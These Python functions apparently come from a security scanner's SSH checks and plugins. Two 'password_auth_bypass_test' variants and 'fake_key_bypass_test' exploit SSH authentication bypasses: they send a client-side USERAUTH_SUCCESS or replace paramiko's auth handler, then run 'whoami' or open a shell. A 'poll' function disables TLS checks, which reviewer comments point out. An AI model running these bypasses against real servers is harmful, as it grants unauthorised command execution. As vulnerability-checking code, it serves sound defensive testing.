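def password_auth_bypass_test(hostname, port):
    """Check whether an SSH server honours a client-sent USERAUTH_SUCCESS.

    The probe connects over TCP, starts the SSH transport, sends
    ``MSG_USERAUTH_SUCCESS`` from the client side without presenting any
    credentials, then asks for a session and runs ``whoami``.  A correctly
    implemented server refuses the session request.

    Args:
        hostname: Host name or address of the SSH server to check.
        port: TCP port of the SSH service (anything ``int()`` accepts).

    Returns:
        True if the combined stdout/stderr of the command contains ``root``;
        False otherwise, including when the connection or the SSH exchange
        fails.
    """
    bufsize = 2048
    command = 'whoami'
    sock = socket.socket()
    transport = None
    try:
        sock.connect((hostname, int(port)))
        transport = paramiko.transport.Transport(sock)
        transport.start_client()
        message = paramiko.message.Message()
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
        client = transport.open_session(timeout=10)
        client.exec_command(command)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)
        # errors="replace" keeps the check from crashing on non-UTF-8 output.
        cmd_out = (stdout.read().decode(errors="replace")
                   + stderr.read().decode(errors="replace"))
        print(cmd_out)
        # NOTE(review): the verdict depends on the session running as root.
        # A server that accepts the session under another account is reported
        # as not vulnerable, and any output that merely contains "root"
        # counts as a hit -- treat the result as a hint, not as proof.
        return 'root' in cmd_out
    except paramiko.SSHException:
        # Reached for any SSH-level failure, not only the case named in the
        # log text below.
        logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False
    finally:
        # Release the transport and the socket on every path; the original
        # left both open after each probe.
        if transport is not None:
            transport.close()
        sock.close()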
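def init(self):
    """Create the record file for the file_record plugin and keep it open.

    Logs the target path, creates ``self.filename`` and stores the open
    handle on ``self.file``.  An existing path is never reused.

    Raises:
        Exception: If ``self.filename`` already exists.
    """
    debug_msg = "[PLUGIN] file_record plugin init..."
    logger.debug(debug_msg)
    logger.info("[PLUGIN] The data will be recorded in {}".format(self.filename))
    # Create and open in one step.  O_EXCL makes the call fail when the path
    # already exists (a dangling symlink included), so nothing can be placed
    # at the path between an existence check and the open.
    flags = os.O_RDWR | os.O_APPEND | os.O_CREAT | os.O_EXCL
    try:
        fd = os.open(self.filename, flags, 0o666)
    except FileExistsError as exc:
        raise Exception("The {} has existed".format(self.filename)) from exc
    # Same read/append mode as before, wrapped around the exclusive descriptor.
    self.file = os.fdopen(fd, 'a+')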
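def poll(self):
    """Fetch and decrypt pending records from the polling endpoint.

    Requests ``https://<server>/poll`` with this client's correlation id and
    secret, then passes every entry of the response's ``data`` list through
    ``self.decrypt_data`` together with the returned ``aes_key``.  Any
    failure inside an attempt is logged at debug level and retried after one
    second, for three attempts in total.

    Returns:
        The decrypted entries of the first attempt that completes, or an
        empty list when all three attempts fail.
    """
    for _ in range(3):
        try:
            # The secret travels in the query string, so it can show up
            # wherever URLs are recorded (proxy logs, exception text).
            url = f"https://{self.server}/poll?id={self.correlation_id}&secret={self.secret}"
            # NOTE(review): verify=False turns off TLS certificate checks, so
            # the peer that supplies aes_key and data is not authenticated.
            # Kept for compatibility; pass a CA bundle instead where possible.
            # The timeout keeps one stalled request from blocking the retry
            # loop indefinitely.
            res = self.session.get(
                url, headers=self.headers, verify=False, timeout=10
            ).json()
            aes_key, data_list = res['aes_key'], res['data']
            # Build the list per attempt: a failure part-way through must not
            # leave entries behind that a later attempt would return twice.
            return [self.decrypt_data(aes_key, item) for item in data_list]
        except Exception as e:
            # NOTE(review): the exception text may include the request URL,
            # and with it the secret -- keep debug logs private.
            logger.debug(e)
            time.sleep(1)
    return []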
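def fake_key_bypass_test(hostname, port, username='******', keyfile=None, command='whoami'):
    """Check whether an SSH server grants a session to an unauthorised key.

    Replaces paramiko's handler for ``MSG_USERAUTH_REQUEST`` with
    ``auth_accept`` (defined elsewhere in this module), connects with the
    given key file and an empty password, runs ``command`` and inspects the
    output.

    Args:
        hostname: Host name or address of the SSH server to check.
        port: TCP port of the SSH service (anything ``int()`` accepts).
        username: Account name sent in the authentication request.
        keyfile: Path to a private key; defaults to ``~/.ssh/id_rsa``.
        command: Command to run once a session is obtained.

    Returns:
        True if the command's stdout, stripped of surrounding whitespace, is
        exactly ``root``; False otherwise, including on any connection,
        SSH or key-file error.
    """
    client = None
    try:
        if keyfile is None:
            # expanduser() also works where HOME is not set in the environment.
            keyfile = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa')
        # NOTE(review): this mutates a class-level table, so the replaced
        # handler stays in effect for every paramiko connection made by this
        # process afterwards, not only for this check.
        paramiko.auth_handler.AuthHandler._server_handler_table.update(
            {paramiko.common.MSG_USERAUTH_REQUEST: auth_accept})
        client = paramiko.SSHClient()
        # Unknown host keys are accepted automatically: the identity of the
        # target is not verified by this check.
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname, port=int(port), username=username,
                       password="", pkey=None, key_filename=keyfile)
        stdin, stdout, stderr = client.exec_command(command)
        # read() returns bytes that end with a newline; comparing them with
        # the str 'root' directly never matched, so decode and strip first.
        cmd_output = stdout.read().decode(errors="replace").strip()
        return cmd_output == 'root'
    except FileNotFoundError:
        logger.debug("Generate a keyfile for tool to bypass remote/local server credentials.")
        return False
    except paramiko.SSHException:
        logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False
    finally:
        # Close the client on failure paths too, not only after success.
        if client is not None:
            client.close()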
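def password_auth_bypass_test(hostname, port):
    """Check whether an SSH server honours a client-sent USERAUTH_SUCCESS.

    The probe connects over TCP, starts the SSH transport, sends
    ``MSG_USERAUTH_SUCCESS`` from the client side without presenting any
    credentials, then asks for a session and an interactive shell.  A
    correctly implemented server refuses the session request.

    Args:
        hostname: Host name or address of the SSH server to check.
        port: TCP port of the SSH service (anything ``int()`` accepts).

    Returns:
        True if the session and shell requests are both accepted; False when
        the connection or the SSH exchange fails.
    """
    sock = socket.socket()
    transport = None
    try:
        sock.connect((hostname, int(port)))
        transport = paramiko.transport.Transport(sock)
        transport.start_client()
        message = paramiko.message.Message()
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
        client = transport.open_session(timeout=10)
        client.invoke_shell()
        return True
    except paramiko.SSHException:
        # Reached for any SSH-level failure, not only the case named in the
        # log text below.
        logger.debug(
            "TCPForwarding disabled on remote server can't connect. Not Vulnerable"
        )
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False
    finally:
        # Release the transport and the socket on every path; the original
        # left both open, including the shell session on a positive result.
        if transport is not None:
            transport.close()
        sock.close()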
def init(self):
    """Announce initialisation of the html_report plugin in the debug log."""
    logger.debug("[PLUGIN] html_report plugin init...")